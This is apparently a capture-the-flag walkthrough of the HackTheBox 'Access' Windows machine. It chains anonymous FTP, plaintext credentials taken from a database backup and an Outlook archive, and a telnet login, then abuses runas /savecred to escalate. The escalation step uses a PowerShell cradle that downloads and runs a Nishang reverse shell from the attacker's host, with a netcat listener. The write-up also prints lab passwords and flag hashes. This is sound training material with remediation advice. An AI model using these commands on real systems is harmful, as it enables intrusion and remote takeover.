HackTheBox - Access Machine
Complete Walkthrough: Physical Security & Saved Credentials
📋 Table of Contents
🎯 Machine Information
🖥️ Target Details
- Machine Name: Access
- IP Address: 10.10.10.98
- OS: Windows XP/7
- Difficulty: Easy
🎲 Machine Theme
- Focus: Physical Security Systems
- Key Skills: FTP Enumeration, Database Analysis
- Attack Vector: Saved Credentials
💡 Machine Learning Objectives
Access is an "easy" difficulty machine that highlights how machines associated with the physical security of an environment may not themselves be secure. It demonstrates how accessible FTP/file shares can often lead to getting a foothold or lateral movement, and teaches techniques for identifying and exploiting saved credentials.
🔍 Reconnaissance & Enumeration
Port Scanning with Nmap
Let's start with a comprehensive port scan to understand our attack surface:
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|*Can't get directory listing: PASV failed: 425 Cannot open data connection.
23/tcp open telnet Microsoft Windows XP telnetd
| telnet-ntlm-info:
| Target_Name: ACCESS
| NetBIOS_Domain_Name: ACCESS
| NetBIOS_Computer_Name: ACCESS
| DNS_Domain_Name: ACCESS
| DNS_Computer_Name: ACCESS
|* Product_Version: 6.1.7600
80/tcp open http Microsoft IIS httpd 7.5
|*http-server-header: Microsoft-IIS/7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|* Potentially risky methods: TRACE
|_http-title: MegaCorp
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp📊 Port Analysis
- Port 21 (FTP): Microsoft FTP service with anonymous login allowed - Primary attack vector
- Port 23 (Telnet): Windows XP Telnet service - Potential access point once we get credentials
- Port 80 (HTTP): Microsoft IIS 7.5 serving MegaCorp website
- Key Finding: Anonymous FTP access provides our initial entry point
📁 FTP Enumeration
Anonymous FTP Access
The Nmap scan revealed that anonymous FTP login is allowed. This is our primary attack vector:
ftp 10.10.10.98
Connected to 10.10.10.98.
220 Microsoft FTP Service
Name (10.10.10.98:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.Directory Exploration
Let's explore the available directories and files:
ftp> ls
425 Cannot open data connection.
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18 09:16PM Backups
08-24-18 10:00PM Engineer
226 Transfer complete. 🗂️ Directory Analysis
- Backups: Likely contains backup files - high potential for sensitive data
- Engineer: Engineering files - possibly containing technical documentation or credentials
Backups Directory Investigation
Let's examine the Backups directory first:
ftp> cd Backups
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18 09:16PM 5652480 backup.mdb
226 Transfer complete.
ftp> get backup.mdb
local: backup.mdb remote: backup.mdb
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
5652480 bytes received in 12.45 secs (443.2 kB/s)Engineer Directory Investigation
Now let's check the Engineer directory:
ftp> cd Engineer
250 CWD command successful.
ftp> ls
200 EPRT command successful.
125 Data connection already open; Transfer starting.
08-24-18 01:16AM 10870 Access Control.zip
226 Transfer complete.
ftp> get Access\ Control.zip
local: Access Control.zip remote: Access Control.zip
200 EPRT command successful.
125 Data connection already open; Transfer starting.
100% |**************************************************| 10870 25.15 KiB/s 00:00 ETA
226 Transfer complete.
10870 bytes received in 0.42 secs (25.15 kB/s)✅ Files Retrieved!
- backup.mdb: 5.6MB Microsoft Access database file
- Access Control.zip: 10.8KB password-protected archive
🗄️ Database Analysis
MDB File Investigation
The backup.mdb file is a Microsoft Access database. Let's analyze it using mdb-tools:
# Install mdb-tools if not already available
sudo apt install mdb-tools
# List all tables in the database
mdb-tables backup.mdbacc_antiback acc_door acc_firstopen acc_firstopen_emp acc_holidays acc_interlock acc_levelset acc_levelset_door_group acc_linkageio acc_map acc_mapdoorpos acc_morecardempgroup acc_morecardgroup acc_timeseg acc_wiegandfmt ACGroup acholiday ACTimeZones action_log AlarmLog areaadmin att_attreport att_waitforprocessdata attcalclog attexception AuditedExc auth_group_permissions auth_message auth_permission auth_user auth_user_groups auth_user_user_permissions base_additiondata base_appoption base_basecode base_datatranslation base_operatortemplate base_personaloption base_strresource base_strtranslation base_systemoption CHECKEXACT CHECKINOUT dbbackuplog DEPARTMENTS deptadmin DeptUsedSchs devcmds devcmds_bak django_content_type django_session EmOpLog empitemdefine EXCNOTES FaceTemp iclock_dstime iclock_oplog iclock_testdata iclock_testdata_admin_area iclock_testdata_admin_dept LeaveClass LeaveClass1 Machines NUM_RUN NUM_RUN_DEIL operatecmds personnel_area personnel_cardtype personnel_empchange personnel_leavelog ReportItem SchClass SECURITYDETAILS ServerLog SHIFT TBKEY TBSMSALLOT TBSMSINFO TEMPLATE USER_OF_RUN USER_SPEDAY UserACMachines UserACPrivilege USERINFO userinfo_attarea UsersMachines UserUpdates worktable_groupmsg worktable_instantmsg worktable_msgtype worktable_usrmsg ZKAttendanceMonthStatistics🔍 Key Table Identification
Among all these tables, the auth_user table stands out as it likely contains user authentication information - exactly what we need for credential discovery!
User Credentials Extraction
Let's extract data from the auth_user table to find credentials:
mdb-export backup.mdb auth_userid,username,password,Status,last_login,RoleID,Remark
25,"admin","***",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","**",1,"08/23/18 21:14:02",26,🎯 Credentials Discovered!
- admin: ***
- engineer: access4u@security
- backup_admin: ****
These credentials will be useful for accessing the password-protected ZIP file!
📦 Archive Analysis
ZIP File Password Cracking
Now that we have potential passwords, let's try to extract the Access Control.zip file:
# Try different passwords from the database
unzip "Access Control.zip"
Archive: Access Control.zip
[Access Control.zip] Access Control.pst password: access4u@security
# Success! The engineer's password works
extracting: Access Control.pst✅ Archive Extracted!
Successfully extracted Access Control.pst using password: access4u@security
PST File Analysis
The extracted file is a Microsoft Outlook PST (Personal Storage Table) file. Let's convert it to readable format:
# Install readpst if not available
sudo apt install pst-utils
# Convert PST to mbox format
readpst "Access Control.pst"
Opening PST file and indexes...
Processing Folder "Deleted Items"
"Access Control" - 2 items done, 0 items skipped.
# List generated files
ls -la
-rw-r--r-- 1 kali kali 156 Jul 31 12:30 Access Control.mbox📧 Email Analysis
Reading Email Contents
Let's examine the contents of the converted mailbox file:
cat "Access Control.mbox"📩 Email Message
From: [email protected] To: [email protected] Subject: Credentials Update ---- The password for the "security" account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers. ----
🔑 Critical Information Found!
- Username: security
- Password: 4Cc3ssC0ntr0ller
- Context: This appears to be credentials for the security account on the Access system
🔌 Telnet Access
Connecting via Telnet
Now we can use the discovered credentials to access the Telnet service we identified in our port scan:
telnet 10.10.10.98
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login: security
password: 4Cc3ssC0ntr0ller
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>🎉 Initial Access Achieved!
Successfully logged in as security user via Telnet!
🚩 User Flag
Flag Discovery
Let's navigate to the security user's desktop and retrieve the user flag:
C:\Users\security>cd Desktop
C:\Users\security\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 8164-DB5F
Directory of C:\Users\security\Desktop
08/28/2018 07:51 AM .
08/28/2018 07:51 AM ..
07/29/2025 11:59 AM 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 3,347,468,288 bytes free C:\Users\security\Desktop>type user.txt
85d48b885cf14ed396b85608b3278068✅ User Flag Captured!
User Flag: 85d48b885cf14ed396b85608b3278068
⚡ Privilege Escalation
System Enumeration
Now we need to escalate privileges to Administrator. Let's explore the system for privilege escalation opportunities:
C:\Users\security>whoami
access\security
C:\Users\security>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600Public Desktop Analysis
Let's check the Public user's desktop for interesting files:
C:\Users\security>cd C:\Users\Public\Desktop
C:\Users\Public\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 8164-DB5F
Directory of C:\Users\Public\Desktop
08/22/2018 10:18 PM 1,870 ZKAccess3.5 Security System.lnk
1 File(s) 1,870 bytes
0 Dir(s) 3,347,468,288 bytes freeShortcut File Analysis
The .lnk file is a Windows shortcut. Let's examine its contents to understand what it executes:
C:\Users\Public\Desktop>type "ZKAccess3.5 Security System.lnk"📄 Raw Shortcut Content
C:\Users\Public\Desktop>type "ZKAccess3.5 Security System.lnk"
L�F�@ ��7���7���#�P/P�O� �:i�+00�/C:\R1M�:Windows���:�▒M�:wWindowsV1MV�System32���:�▒MV��System32▒X2P�:�
runas.exe���:1��:1�Yrunas.exe▒L-K��E�C:\Windows\System32\runas.exe#..\..\..\Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"'C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico�%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico�%�
�wN�▒�]N�D.��Q���`�Xaccess�_���8{E�3
O�j)�H���
)ΰ[�_���8{E�3
O�j)�H���
)ΰ[� ��1SPS��XF�L8C���&�m�eS-1-5-21-953262931-566350628-63446256-500
🚨 Critical Discovery - Saved Credentials!
From the shortcut analysis, we can extract a crucial piece of information:
runas.exe /user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"
Key Finding: The /savecred parameter means Administrator credentials are saved and can be reused!
Exploitation Setup
We can exploit the saved credentials to execute commands as Administrator. Let's prepare a reverse shell payload using Nishang:
# Download Nishang framework
git clone https://github.com/samratashok/nishang.git
# Create web directory
mkdir ~/www
# Copy PowerShell reverse shell
cp nishang/Shells/Invoke-PowerShellTcp.ps1 ~/www/
# Edit the script to add our reverse shell command at the end
echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.10 -Port 443' >> ~/www/Invoke-PowerShellTcp.ps1Web Server Setup
Start a web server to host our PowerShell payload:
# Start Python web server
cd ~/www
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...🔒 Network Access Note
Since we're connected to HTB VPN, any machine on the HTB network can reach our web server at our VPN IP address (10.10.14.10).
Reverse Shell Listener
Set up a netcat listener to catch our reverse shell:
# Start netcat listener
nc -lvnp 443
listening on [any] 443 ...Privilege Escalation Execution
Now we exploit the saved credentials to execute our PowerShell payload as Administrator:
C:\Users\Public\Desktop>runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.10:80/Invoke-PowerShellTcp.ps1')"Administrator Shell Obtained
Our netcat listener catches the reverse shell with Administrator privileges:
nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.98] 49159
Windows PowerShell running as user Administrator on ACCESS
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
access\administrator
PS C:\Windows\system32> hostname
ACCESS🎉 Privilege Escalation Successful!
We now have a PowerShell session running as Administrator!
🏆 Root Flag
Administrator Desktop Access
Let's navigate to the Administrator's desktop and retrieve the root flag:
PS C:\Windows\system32> cd C:\Users\Administrator\Desktop
PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 8/21/2018 10:18 PM 32 root.txtFinal Flag Capture
PS C:\Users\Administrator\Desktop> type root.txt
9d59301ec8f4615078414751950b6820🎉 MACHINE PWNED!
Root Flag: 9d59301ec8f4615078414751950b6820
We have successfully compromised the HTB Access machine and obtained both user and root flags!
🎓 Lessons Learned & Key Takeaways
Attack Chain Summary
Port Scanning
Identified FTP (21), Telnet (23), and HTTP (80) services
FTP Enumeration
Anonymous FTP access revealed backup files
Database Analysis
Extracted credentials from Microsoft Access database
Archive Extraction
Used found credentials to unlock password-protected ZIP
Email Analysis
Discovered security account credentials in PST file
Telnet Access
Gained initial foothold using discovered credentials
Privilege Escalation
Exploited saved Administrator credentials via runas
Technical Skills Demonstrated
🔍 Enumeration
- Port scanning with Nmap
- FTP anonymous access
- File system exploration
🗄️ Database Analysis
- Microsoft Access MDB files
- MDB-tools usage
- Credential extraction
📧 Email Forensics
- PST file analysis
- Readpst tool usage
- Email content examination
🔓 Archive Analysis
- Password-protected archives
- Credential reuse attacks
- ZIP file extraction
🔌 Legacy Protocols
- Telnet authentication
- Windows command line
- System enumeration
⚡ Privilege Escalation
- Saved credentials exploitation
- PowerShell payloads
- Reverse shell techniques
Security Lessons
🔐 Anonymous Access
Anonymous FTP access can lead to significant data exposure. Backup files and sensitive documents should never be accessible without authentication.
🔑 Credential Storage
Storing plaintext credentials in databases is extremely dangerous. Passwords should always be properly hashed and salted.
📧 Email Security
Sensitive information like passwords should never be transmitted via email. Use secure communication channels and temporary passwords.
💾 Saved Credentials
The /savecred parameter in runas creates a significant security risk. Saved credentials can be reused by any user on the system to execute commands with elevated privileges.
🔌 Legacy Services
Telnet transmits credentials in plaintext and should be replaced with SSH. Legacy services often lack modern security features.
🛡️ Defense in Depth
Multiple security failures led to complete compromise. Each layer should be secured independently to prevent cascading failures.
Tools and Resources Used
🛠️ Essential Tools
- Nmap: Network reconnaissance and service discovery
- FTP Client: Anonymous file transfer and enumeration
- MDB-Tools: Microsoft Access database analysis
- Readpst: Microsoft Outlook PST file conversion
- Unzip: Archive extraction with password attempts
- Telnet: Remote access to legacy services
- Nishang: PowerShell reverse shell framework
- Python HTTP Server: Payload hosting
- Netcat: Reverse shell listener
Remediation Recommendations
🛡️ Security Improvements
- Disable Anonymous FTP: Require authentication for all FTP access
- Secure Backup Storage: Store backups in encrypted, access-controlled locations
- Hash Passwords: Never store plaintext credentials in databases
- Disable Telnet: Replace with SSH for secure remote access
- Remove Saved Credentials: Disable /savecred functionality in production
- Implement Email Security: Use encrypted channels for sensitive communications
- Regular Security Audits: Periodically review file permissions and access controls
- Network Segmentation: Isolate critical systems from general network access
Physical Security Context
🏢 Real-World Implications
This machine demonstrates a common scenario where physical security systems (access control, card readers, etc.) are managed by insecure IT infrastructure. Key lessons include:
- Integrated Security: Physical and IT security must be considered together
- Access Control Systems: Often run on standard IT infrastructure with poor security
- Backup Procedures: Physical security databases contain sensitive information requiring protection
- Vendor Security: Third-party security solutions may have their own vulnerabilities
Key Takeaways for Penetration Testers
💡 Professional Insights
- Always check for anonymous access on file sharing services
- Database files often contain goldmine information - learn to analyze different formats
- Email archives (PST files) frequently contain credentials and sensitive information
- Look for saved credentials mechanisms in Windows environments
- Legacy services often have weaker security - don't overlook them
- Credential reuse is extremely common - always test found passwords across different services
🎯 Conclusion
The HTB Access machine provides an excellent introduction to common penetration testing techniques, focusing on the critical importance of proper credential management and access controls. This machine effectively demonstrates how seemingly separate security issues can be chained together to achieve complete system compromise.
The scenario is particularly relevant to real-world environments where physical security systems are often managed by poorly secured IT infrastructure, making it an invaluable learning experience for both beginners and professionals in cybersecurity.